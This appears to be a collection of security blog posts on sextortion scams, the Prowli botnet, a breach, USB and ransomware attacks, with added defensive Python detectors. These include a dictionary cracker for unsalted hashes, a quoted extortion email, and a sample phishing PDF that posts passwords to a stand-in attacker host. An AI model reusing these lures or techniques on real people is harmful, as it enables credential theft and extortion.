Ransom Demand Scam Tricks Users by Using Real Passwords in Emails

Have you heard about the new ransom demand sextortion scam? Cybercriminals have implemented a new method of false blackmail to scare users into paying bitcoin.

The email reads:

I’m aware that X is your password.

You don’t know me and you’re thinking why you received this email, right?

Well, I actually placed a malware on the porn website and guess what, you visited this website to have fun (you know what I mean). While you were watching the video, your web browser acted as an RDP (Remote Desktop) and a keylogger which provided me access to your display screen and webcam. Right after that, my software gathered all your contacts from your Messenger,  Facebook account, and email account.

What exactly did I do?

I made a split-screen video. First part recorded the video you were viewing (you’ve got a fine taste haha), and next part recorded your webcam (Yep! It’s you doing nasty things!).

What should you do?

Well, I believe, $1400 will be a fair price to pay so your secrets stay safe with me. You’ll make the payment via Bitcoin to the below address (if you don’t know this, search “how to buy bitcoin” in Google).

BTC Address: 1Dvd7Wb72JBTbAcfTrxSJCZZuf4tsT8V72

(It is cAsE sensitive, so copy and paste it)

Important:

You have 24 hours in order to make the payment. (I have a unique pixel within this email message, and right now I know that you have read this email). If I don’t get the payment, I will send your video to all of your contacts including relatives, co-workers, and so forth. Nonetheless, if I do get paid, I will erase the video immediately. If you want evidence, reply with “Yes!” and I will send your video recording to your 5 friends. This is a non-negotiable offer, so don’t waste my time and yours by replying to this email.

To be clear, there is only a slim chance that anyone has actually recorded a video of you; this email is a scam. With that said, hackers are able to make emails like this convincing nowadays by using a new trick: quoting your real password, most probably obtained through corporate data breaches within the last few years.

This has really changed the cyber-blackmailing game, but luckily the hackers don’t have access to current passwords.

“[A]ll three recipients said the password was close to ten years old, and that none of the passwords cited in the sextortion email they received had been used anytime on their current computers,” explained researcher Brian Krebs. In other words, the stolen passwords are old and outdated.

While sextortion scams like this have been around for a long time, there are no reports of any cybercriminals actually using this strategy and installing malware to film somebody pleasuring themselves while watching porn. It’s far easier to simply lie about it and persuade people that it’s true.

To be safe from hackers, cover your webcam when it is not in use and change your passwords regularly so that a leaked credential cannot be used to access your accounts. To be on the safe side, you can also set up two-factor authentication and secure logins.
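For anyone running a mail filter or helpdesk queue, the template quoted above is easy to score automatically. The following is an added example written for this post, not code from the original article or from any of the researchers it cites: it scores a message against the recurring phrases, extracts the Bitcoin address and checks its Base58Check checksum (so noise is not logged as an indicator), and pulls out the “password” the scammer quotes so the recipient can be told to rotate it wherever it is still in use. The sample email, the password `hunter2` and the benign message are constructed; the address is the well-known Bitcoin genesis-block address, used only as a known-valid checksum case.

```python
import hashlib
import re

# Constructed sample for testing, modelled on the template quoted above; the
# password is made up and the address is the public genesis-block address.
SAMPLE_EMAIL = """Subject: Your account
I'm aware that hunter2 is your password.
You don't know me and you're thinking why you received this email, right?
Well, I believe, $1400 will be a fair price to pay so your secrets stay safe with me.
BTC Address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
You have 24 hours in order to make the payment."""

BENIGN_EMAIL = "Hi team, the quarterly report is attached. Thanks!"

# Phrases that recur across the template; each hit adds one point to the score.
LURE_PHRASES = [
    r"\bis your password\b",
    r"\bwebcam\b",
    r"\bsplit[- ]screen\b",
    r"\bbitcoin\b|\bbtc\b",
    r"\b24 hours\b",
    r"\byour contacts\b",
]
# Legacy (Base58) Bitcoin address shape: starts with 1 or 3, 26-35 chars, no 0/O/I/l.
BTC_ADDR_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")
PASSWORD_CLAIM_RE = re.compile(r"aware that (\S+) is your password", re.I)

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def base58check_valid(addr: str) -> bool:
    """True if the 4-byte double-SHA-256 checksum of a legacy address is intact.
    A random-looking string that fails this is noise; one that passes is worth
    recording as an indicator for the campaign."""
    n = 0
    for ch in addr:
        if ch not in B58:
            return False
        n = n * 58 + B58.index(ch)
    try:
        payload = n.to_bytes(25, "big")  # 1 version byte + 20-byte hash + 4-byte checksum
    except OverflowError:
        return False
    body, checksum = payload[:21], payload[21:]
    return hashlib.sha256(hashlib.sha256(body).digest()).digest()[:4] == checksum


def analyse(text: str) -> dict:
    """Score a message against the sextortion template and pull out the quoted
    password so the account owner can be told to rotate it."""
    lowered = text.lower()
    hits = [p for p in LURE_PHRASES if re.search(p, lowered)]
    addrs = BTC_ADDR_RE.findall(text)
    m = PASSWORD_CLAIM_RE.search(text)
    claimed = m.group(1).rstrip(".,;") if m else None
    score = len(hits) + (2 if addrs else 0) + (2 if claimed else 0)
    return {
        "sextortion": score >= 4,
        "score": score,
        "btc_addresses": [(a, base58check_valid(a)) for a in addrs],
        "claimed_password": claimed,
    }


if __name__ == "__main__":
    for name, msg in [("sample", SAMPLE_EMAIL), ("benign", BENIGN_EMAIL)]:
        print(name, analyse(msg))
```

The threshold of 4 is an assumption chosen so that a quoted password plus an address is enough on its own; tune it against your own mail before relying on it, and treat a hit on `claimed_password` as a reason to check whether that string is still a live credential anywhere in the organisation.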

To read more about this click here.

Prowli Malware Targeting Servers, Routers, and IoT Devices

After the discovery of the VPNFilter malware, security analysts have revealed another monster botnet that has damaged 40,000 servers at over 9,000 businesses across many sectors, including finance, education, and government organizations. This malware, called “Prowli,” has been spreading malware and injecting malicious code to take over servers and websites around the world, using attack techniques such as known exploits and the abuse of weak configurations.

Here’s the list of devices and services infected by the Prowli malware:

  • Drupal and WordPress CMS servers hosting popular websites
  • Joomla! servers running the K2 extension
  • Backup servers running HP Data Protector software
  • DSL modems
  • Servers with an open SSH port
  • PhpMyAdmin installations
  • NFS boxes
  • Servers with exposed SMB ports
  • Vulnerable Internet-of-Things (IoT) devices

As HackerNews explains in their recent article, “the attackers behind the Prowli attack are abusing the infected devices and websites to mine cryptocurrency or run a script that redirects them to malicious websites, [and] researchers believe they are more focused on making money rather than ideology or espionage.”

According to GuardiCore researchers, the worm runs commands on remote victims and then reports the credentials it used to a C2 server.

In simplistic terms, the researcher explains:

“r2r2 randomly generates IP address blocks and iteratively tries to brute force SSH logins with a user and password dictionary. Once it breaks in, it runs a series of commands on the victim…”

Attackers Also Trick Users Into Installing Malicious Extensions

Other than the cryptocurrency miner, attackers are also using a well-known open source web shell called “WSO Web Shell” to modify the compromised servers. Eventually, they trick visitors of the compromised websites by redirecting them to fake, malicious browser extensions. Moreover, researchers have found that the Prowli campaign spans various industries, noting that “[o]ver a period of 3 weeks, [they have] captured dozens of such attacks per day coming from over 180 IPs from a variety of countries and organizations.”

How to Protect Your Devices From Prowli-like Malware Attacks

Since attackers are using a mix of known vulnerabilities and credential guessing to compromise devices, users should always make sure their systems are patched and up to date, and always use strong passwords to avoid the possibility of getting hacked.

In particular, users should also consider hardening the frameworks they run and segmenting vulnerable or hard-to-secure systems in order to separate them from the rest of their network.
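The r2r2 behaviour described above (randomly chosen IP blocks, a user and password dictionary, then commands once a login succeeds) leaves a very recognisable trail in `sshd` logs: a burst of failures from one address, often across several usernames, followed by an “Accepted” line. As an added example (written for this post, not GuardiCore’s tooling or the Prowli code), here is a small detector that reads syslog-style `auth.log` lines and flags sources that cross a failure threshold inside a time window, marking whether a successful login followed. The log excerpt is constructed, with documentation-range IP addresses, and the year is assumed to be 2018 because syslog lines carry no year.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt (not real data). 203.0.113.7 plays the r2r2-style
# brute forcer; 198.51.100.23 is a legitimate user who mistyped once.
AUTH_LOG = """\
Jun  7 10:15:01 web1 sshd[2201]: Failed password for root from 203.0.113.7 port 40122 ssh2
Jun  7 10:15:03 web1 sshd[2203]: Failed password for invalid user admin from 203.0.113.7 port 40130 ssh2
Jun  7 10:15:04 web1 sshd[2205]: Failed password for root from 203.0.113.7 port 40141 ssh2
Jun  7 10:15:06 web1 sshd[2207]: Failed password for invalid user test from 203.0.113.7 port 40150 ssh2
Jun  7 10:15:08 web1 sshd[2209]: Failed password for root from 203.0.113.7 port 40162 ssh2
Jun  7 10:15:09 web1 sshd[2211]: Accepted password for root from 203.0.113.7 port 40170 ssh2
Jun  7 10:20:44 web1 sshd[2290]: Failed password for alice from 198.51.100.23 port 51012 ssh2
Jun  7 10:20:50 web1 sshd[2292]: Accepted publickey for alice from 198.51.100.23 port 51013 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse(lines: str, year: int = 2018):
    """Turn sshd log lines into (timestamp, result, method, user, ip) tuples."""
    events = []
    for line in lines.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated sshd chatter
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["method"], m["user"], m["ip"]))
    return events


def find_bruteforce(events, threshold: int = 5, window_s: int = 60) -> dict:
    """Return {ip: info} for sources with >= threshold failures inside window_s
    seconds, noting whether a later success from the same source followed,
    which is the point at which the host should be treated as compromised."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[4]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [e for e in evs if e[1] == "Failed"]
        for i in range(len(fails)):
            j = i
            while j < len(fails) and (fails[j][0] - fails[i][0]).total_seconds() <= window_s:
                j += 1
            if j - i >= threshold:
                success = next((e for e in evs if e[1] == "Accepted" and e[0] >= fails[j - 1][0]), None)
                alerts[ip] = {
                    "failures": j - i,
                    "usernames": sorted({e[3] for e in fails[i:j]}),
                    "followed_by_success": success is not None,
                    "success_user": success[3] if success else None,
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, info in find_bruteforce(parse(AUTH_LOG)).items():
        print(ip, info)
```

The threshold and window are assumptions; a dictionary attack like r2r2’s typically produces far more than five failures a minute, so the defaults err on the side of noise. A success after the burst is the alert that matters: the advice above (patching, strong passwords, segmentation) stops the login, while this detection tells you when it did not.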

Data Breach within MyHeritage Announced — 92M User Emails and Passwords Exposed

It’s one piece of news you never want to see or hear: that your personal account has been compromised through a data breach at a website you trusted to keep your information secure. We’ve seen it happen multiple times at companies such as Yahoo and Equifax, and recently MyHeritage, a family tree and genetic history website, has also joined the data-breach train, with 92 million users affected through the compromise of their emails and passwords.

As explained in one of MyHeritage’s blog posts, a security researcher discovered a file on “a private server” titled “myheritage” that contained millions of account emails and hashed passwords, that is, passwords run through a one-way hash so that the stored data cannot be read directly. While hashed passwords are somewhat protected from being “reversed” into the original password (it does take extensive computing knowledge to do so), MyHeritage has advised all its users to create new passwords regardless.

At times like these, it is always a good idea to use a password that is unique to MyHeritage, rather than updating the password to one that is already used for another website. Hackers can always cross-reference the list of emails obtained through this breach with the lists obtained through previous breaches to access other sensitive information you own. Having a unique password for each website halts such access.
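Two things in the paragraphs above are worth seeing concretely: why a dump of “hashed” passwords is still dangerous for weak or reused passwords, and why a site should hash with a per-user salt and a slow function. The following is an added demonstration written for this post (not MyHeritage’s code, and no claim about how MyHeritage hashes); the two dumps are constructed with `example.com` addresses, and the SHA-1 scheme is assumed only to show the worst case. It recovers the weak passwords from an unsalted dump with one hash per dictionary word, cross-references two dumps the way the paragraph describes, and then shows the standard-library `scrypt` alternative, where the same password produces different hashes for different users.

```python
import hashlib
import hmac
import os

# Constructed sample data for the demonstration; none of these are real accounts.
WORDLIST = ["123456", "password", "qwerty", "letmein", "iloveyou"]


def sha1_hex(pw: str) -> str:
    return hashlib.sha1(pw.encode()).hexdigest()


# What an attacker would hold after a breach of a site that stored bare SHA-1 hashes.
BREACH_DUMP = {
    "alice@example.com": sha1_hex("password"),
    "bob@example.com": sha1_hex("123456"),
    "carol@example.com": sha1_hex("Tq8#rV!2mZ0pL-bird"),  # long, not in any wordlist
}
# A second, older dump from another site, for the cross-referencing point.
OTHER_SITE_DUMP = {
    "alice@example.com": sha1_hex("password"),  # same password on both sites
    "carol@example.com": sha1_hex("a-different-passphrase"),
}


def crack_unsalted(dump: dict, wordlist: list) -> dict:
    """With no per-user salt, one hash per candidate word exposes every account
    that used that word, which is why weak passwords fall immediately."""
    table = {sha1_hex(w): w for w in wordlist}
    return {email: table[h] for email, h in dump.items() if h in table}


def reused_across_sites(dump_a: dict, dump_b: dict) -> list:
    """Emails present in both dumps with identical hashes reused the same password
    (this comparison only works because both sites hashed without a salt)."""
    return sorted(e for e in dump_a.keys() & dump_b.keys() if dump_a[e] == dump_b[e])


def hash_password(pw: str, salt: bytes = b""):
    """Salted, memory-hard hashing with scrypt from the standard library: a fresh
    random salt per user means equal passwords no longer produce equal hashes."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(pw.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt, digest


def verify_password(pw: str, salt: bytes, digest: bytes) -> bool:
    _, candidate = hash_password(pw, salt)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    print("cracked:", crack_unsalted(BREACH_DUMP, WORDLIST))
    print("reused on both sites:", reused_across_sites(BREACH_DUMP, OTHER_SITE_DUMP))
    salt, digest = hash_password("Tq8#rV!2mZ0pL-bird")
    print("scrypt verify:", verify_password("Tq8#rV!2mZ0pL-bird", salt, digest))
```

Carol’s long, unique password survives the dictionary pass even in the weak scheme, and Alice is exposed twice over: once by the word “password” and again because the same hash shows up at the other site. That is the whole case for a unique password per website, and for the site side, a salted slow hash so that a leaked table does not crack in bulk.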

As MyHeritage explains in their post:

Credit card information is not stored on MyHeritage to begin with, but only on trusted third-party billing providers (e.g. BlueSnap, PayPal) utilized by MyHeritage. Other types of sensitive data such as family trees and DNA data are stored by MyHeritage on segregated systems, separate from those that store the email addresses, and they include added layers of security. We have no reason to believe those systems have been compromised.

Keeping this statement in mind, we can rest assured the company has looked into other aspects of the data breach to make certain other information was not compromised. The company has further explained in its blog statement that two-factor authentication will be implemented soon, as it is now “expediting” the process. This authentication will allow users to include a mobile number along with their password to log in to MyHeritage, further helping safeguard their accounts from unlawful access.

For now, MyHeritage has provided a 24/7 security customer support team to answer any or all questions for users who have concerns regarding the data breach.

For more information, click here.

Don’t Plug in USBs That You Don’t Own – Ever

A word of advice: don’t trust USBs that you don’t know. Generally speaking, don’t just openly trust technology.

By now, you’ve heard that you should never plug in a USB Flash Drive that you don’t own. If you’ve been following along on our blog, you may have seen our post about it last year.

By 2018, the USB game has evolved. We used to just worry about computers, but now we have to be concerned about our smartphones, too. A new research study from Ben-Gurion University of the Negev in Israel has exposed 29 types of USB attacks. These attacks can be carried out by a variety of methods including plugging into a public USB port or using a USB charger.

Tech Republic spoke with one of the researchers, Ran Yahalom, about the study.

Yahalom said, “We surveyed 29 attacks, updated last year. New methods of likely developed and published attacks increase that number. The microcontroller, a reprogrammable microcontroller used to impersonate peripherals as well as an actually the firmware update. Academic circles call this ‘bad USB.’ It’s a family of attacks based on reprogramming the firmware.”

He went on to add, “If you go into a coffee shop and use a charger there, or an airport or a train station, any charger that is not your own, you don’t know what that piece of hardware really does,” Yahalom emphasized. “It may not be a charger, but a microcontroller hidden inside a charger casing. It could be something else. You don’t know. Once put into your phone, anything could happen.

I demonstrated how to connect a keyboard to a phone. But it doesn’t look like a keyboard, it looks like a charger, but it’s actually a microcontroller I reprogrammed. I programmed it to act as a keyboard, so it impersonates a keyboard and it looks like a charger. It’s connected to the socket, but without an electrical part of that charger, it’s just a microcontroller. I showed how to connect it to and lock the phone, a sort of ‘ransomware.’”

Yahalom made a fabulous point that illustrated how we should truly view technology.

“The general rule of thumb is: treat technology as something you don’t naturally trust. As users, we have a tendency to trust technology, to trust peripherals, i.e., you trust your flash drive, you trust your keyboard, but you trust it because you’re not aware. Treat it as a syringe: You wouldn’t find a syringe in the parking lot, pick it up, and inject it into yourself. Because you’re aware you could be infected. You have no knowledge of what could happen, but are afraid because it could be dangerous. This is exactly the same thing.”

Keep a few things in mind:

  • Bring your own charger.
  • Use your own hardware.
  • Don’t trust Wi-Fi networks.
  • Don’t trust technology.

To read more about these 29 USB attacks, this article on Bleeping Computer will get you up-to-speed.

Be sure to subscribe to our newsletter to stay up-to-date on any technology news.

2018 Winter Olympics “Olympic Destroyer” Malware

Picture of the Olympic Rings on the Montreal International Olympic Committee (IOC) building (Canada), built for the 1976 Summer Olympic Games

During the Winter Olympics opening ceremony last week, the Wi-Fi and television systems used by on-site journalists covering the event failed unexpectedly. On Sunday, Olympics officials reported that the failures weren’t simply an accident: they were the result of a targeted cyberattack against the event.

Unfortunately, this isn’t the only cyberattack the 2018 Winter Olympics have been targeted with. The attacks came after certain Russian athletes were banned from the games. A Russian hacking group, Fancy Bears, claimed responsibility for the various attacks on the U.S. and International Olympic Committees as a result of the ban.

After the attack, Cisco Talos looked into the Olympic Destroyer malware and determined that the malware was capable of interfering with a Windows computer’s data recovery processes. Also, it had the capabilities of deleting critical services.

The researchers stated, “The samples identified, however, are not from adversaries looking for information from the games, but instead they are aimed to disrupt the games. The samples analyzed appear to perform only destructive functionality.”

Another major issue was that files on network shares were also gone. Additionally, the malware uses a self-patching feature that allows it to change as it moves from one host system to the next. Lastly, it was discovered that it was using the EternalRomance exploit, an NSA exploit leaked by the Shadow Brokers in 2017 that was also used to spread the NotPetya ransomware last year (alongside EternalBlue).

As of now, that’s the latest information we’ve seen. We’ll update this if there is more information.

31 Days of Cybersecurity in October

It’s almost October, meaning it’s time for pumpkin spice everything, Halloween preparations, and Cybersecurity Awareness Month! The month of October is designated to educate the public about the importance of cybersecurity.

For 31 days straight, we will be posting a tip a day on our Facebook page, so be sure to “like” us so you don’t miss out!

According to the Department of Homeland Security, the monthly awareness program was “designed to engage and educate public and private sector partners through events and initiatives to raise awareness about the importance of cybersecurity, provide them with tools and resources needed to stay safe online, and increase the resiliency of the Nation in the event of a cyber incident.”

With the direction technology is headed, it’s no secret that cybersecurity is at the top of the list of concerns for people all over the world. Global cyberattacks, data breaches, and ransomware attacks have dominated the headlines recently, exposing citizens to an overwhelming number of cyber problems. While these problems are very real, we believe that the true weapon against cyber-destruction is knowledge.

In some cases, there is a breakout of a phenomenon known as “security fatigue.”

Is security fatigue real?

With the increasing number of cyber problems accumulating on a daily basis, it seems that individuals have been developing a phenomenon known as “security fatigue,” or risky computing behavior in response to too many instructions and ads against such attacks.

Constantly changing passwords, two-factor authentication, CAPTCHAs, and strong passwords are said to potentially add too much of a burden on employees. At more advanced companies, you might start seeing a move toward biometrics rather than relying on ever-changing passwords to act as the security wall.

For those of us who do not have access to biometrics and fingerprint authentication, we’re going to bring an innovative spin to tried-and-true methods all of us should be putting into practice.

Be sure to follow along on our Facebook page for daily tips that are quick to implement and easy to share. Be sure to let us know if you try them out! #Inverselogic #October #CybersecurityAwarenessMonth

New Ransomware Strain Demands Nudes, Not Bitcoin

Normally, when you see the popular kids cartoon character, Thomas the Train, you don’t think anything of it. But if you see Thomas the Train show up on your computer, it might not be such a pleasant sight. As if extorting money and encrypting files wasn’t bad enough, cybercriminals have taken it to the next level: demanding naked photographs instead of Bitcoin. The new ransomware called nRansomware was first spotted by researchers at MalwareHunterTeam on Thursday.

The message reads that the computer has been locked and demands that the victim send “at least 10 nude pictures of you,” claiming that they will verify that the pictures are indeed of the victim. They also mention that those nude photographs will be sold on the Dark Web.

MalwareHunterTeam warns that it may simply be a prank since it doesn’t actually encrypt files; it’s simply a screenlocker. There is no information on anyone being infected as of yet.

If this is a real strain of ransomware, it’s a very sick, twisted type of attack. While it’s not entirely unexpected, since hacking and malware have been used to access webcams before, it has definitely reached a new low.

The Answer to Automotive Cybersecurity: Symbiote Automotive Defense

Did you think only your laptop and computer can be hacked? Well, think again. A few years ago, the only security worries for most car owners were people hot-wiring the ignition or breaking windows. Nowadays, with GPS systems, cameras, automatic brakes, Bluetooth, and even computers built into vehicles, drivers have cyber threats to worry about too.

Like most connected items, we forget how susceptible they are to security issues.

Over the past few years, there has been a steady increase in car-hacking studies. In 2016, the FBI and the US National Highway Traffic Safety Administration even noted that connected cars are becoming “increasingly vulnerable” to cyberattacks.

At the Defcon Security Conference in 2015, hackers showed off how they were able to breach a Tesla Model S: they unlocked the doors, started the car and drove it away – all without even touching the steering wheel!

In 2016, hackers in Houston showed how easy it was to hack into a car via a laptop.

Red Balloon Security is a cybersecurity company that plays a major role in automotive cyber defense. On Wednesday at the Escar USA Conference (The World’s Leading Automotive Cyber Security Conference) in Detroit, Red Balloon announced their newest product – Symbiote for Automotive Defense.

PROJECT SYMBIOTE: The First Universal Embedded Defense for all embedded devices.

Symbiote already exists for connected devices (think smart fridges and connected coffee makers) and works as a cybersecurity add-on that defends against malware since it’s installed in the embedded device. It is now available for cars of all makes and models.

The CEO of Red Balloon Security, Ang Cui, said in a statement, “As cars become more advanced in the years ahead, and this technology is more widely deployed across all vehicle models, drivers will face a growing set of risks from remote attacks.”

And if you suspected that ransomware would be targeted at cars, you’re probably right. Symbiote for Automotive Defense should protect against car hijacking and zero-day attacks.

“We fully expect Symbiote for Automotive Defense to become ubiquitous in new automobiles,” Cui said. “First, millions, then hundreds of millions of vehicles.”

NHS, FedEx and Other Major Companies Hit in Global Cyberattack

A global cyberattack today hit more than 74 countries, with some 45,000 attacks carried out. Among those affected, 16 National Health Service (NHS) hospitals in England were hit, along with FedEx and Spain’s largest telecom.

The attack appears to be carried out by hackers using a stolen tool created by the United States National Security Agency (NSA): WannaCry Ransomware.

With this strain of ransomware, $300 (£233) is being demanded in exchange for the decryption key for each locked system. Hospitals were forced to shut down their emergency rooms and send patients to other locations. Patient records, schedules, phones and email were all compromised during the attack, putting a number of patients at grave risk.

As of now, it is not being treated as a matter of national security brought on by a foreign power, but it is still being treated as a very serious matter.

For more information, please visit reevert.com to read the full article.

Locked PDF Phishing Scam Attack

Last week, the SANS Internet Storm Center alerted people about an active phishing campaign that contains malicious PDF attachments. This PDF phishing scam is specifically aiming to steal email credentials.

The email’s subject line reads “Assessment document,” and the body contains a single PDF attachment. The message reads: “PDF Secure File UNLOCK to Access File Content.”


Photo courtesy of KnowBe4.com

You are then prompted to enter your email and email password to “view” the document. This is the type of phishing campaign that targets everyone, not just the more sophisticated users. Founder & CEO of KnowBe4, Stu Sjouwerman, says, “This is a large spray-and-pray campaign that hopes to get a small foothold into your org via an email account and then compromise, tunnel in or send spear-phishing attacks.”

Once opened (using any email / password variation), the PDF suggests that it is a SWIFT banking transaction and transmits any entered data to the spammer.

SANS says, “Be wary of emails from domains that don’t match the contents, note that encrypted PDF documents are not locked this way (and will never ask you for your actual email password anyway), and look for other inconsistencies that give these away as scams.”
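SANS’s point that real encrypted PDFs are not “locked” this way can be turned into a mail-gateway check: a credential-harvesting PDF needs a form, a field that takes a password, and somewhere to send it, and all three show up in the file’s dictionaries. The following is an added example written for this post, not a tool from SANS or KnowBe4: a byte-level triage scan that resolves the `#xx` hex escapes attackers use to hide names like `/SubmitForm`, lists risky keys and outbound URLs, and flags a PDF that wires a password field to a submit action. Both PDFs are constructed inline, and `attacker.example` is a placeholder host. The scan does not inflate compressed object streams, so a clean verdict means “nothing visible in plain text,” not “safe.”

```python
import re

# Constructed minimal PDF modelled on the lure: a form with an email and a
# password field whose submit action posts to an attacker-controlled URL
# (placeholder host). /Sub#6ditForm is /SubmitForm written with a hex escape,
# a common way to dodge naive keyword scans.
SUSPICIOUS_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /AcroForm << /Fields [4 0 R 5 0 R] >> /OpenAction 6 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R 5 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Widget /FT /Tx /T (email) /Rect [50 700 300 720] >> endobj
5 0 obj << /Type /Annot /Subtype /Widget /FT /Tx /T (password) /Ff 8192 /Rect [50 670 300 690] >> endobj
6 0 obj << /S /Sub#6ditForm /F (http://attacker.example/collect.php) /Flags 4 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed one-page PDF with no forms or actions, for comparison.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

RISKY_KEYS = [b"/JavaScript", b"/JS", b"/SubmitForm", b"/Launch", b"/OpenAction", b"/URI", b"/AcroForm"]
PASSWORD_FLAG = 1 << 13  # bit 14 of /Ff on a text field marks it as a password field


def normalize_names(data: bytes) -> bytes:
    """Resolve #xx hex escapes inside PDF names so /Sub#6ditForm reads as /SubmitForm."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Byte-level triage (does not inflate compressed streams): report risky
    dictionary keys, outbound URLs, form field names, and whether a password
    field is wired to a submit action."""
    norm = normalize_names(data)
    findings = {k.decode(): norm.count(k) for k in RISKY_KEYS if k in norm}
    urls = [u.decode() for u in re.findall(rb"/(?:F|URI)\s*\((https?://[^)]+)\)", norm)]
    fields = [f.decode(errors="replace") for f in re.findall(rb"/T\s*\(([^)]*)\)", norm)]
    flags = [int(f) for f in re.findall(rb"/Ff\s+(\d+)", norm)]
    password_field = any(f & PASSWORD_FLAG for f in flags) or any("pass" in n.lower() for n in fields)
    if password_field and ("/SubmitForm" in findings or urls):
        verdict = "phishing-form"
    elif findings:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings, "urls": urls, "fields": fields}


if __name__ == "__main__":
    for name, doc in [("suspicious", SUSPICIOUS_PDF), ("benign", BENIGN_PDF)]:
        print(name, scan_pdf(doc))
```

A “review” verdict (forms or actions present, but no password field feeding a submit) is the right place for legitimate fillable forms and for anything hidden inside compressed streams; for those, hand the file to a full parser or a sandbox rather than trusting this quick pass.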

If you’ve got Adobe Reader, it will warn you upon opening the file. However, if you’re running Windows 10, be extra wary: the default browser is Edge, which does not appear to give any warning when you open the PDF.

Be sure to think extra hard before you click so that you don’t become victim to any PDF phishing scam or malicious attempts.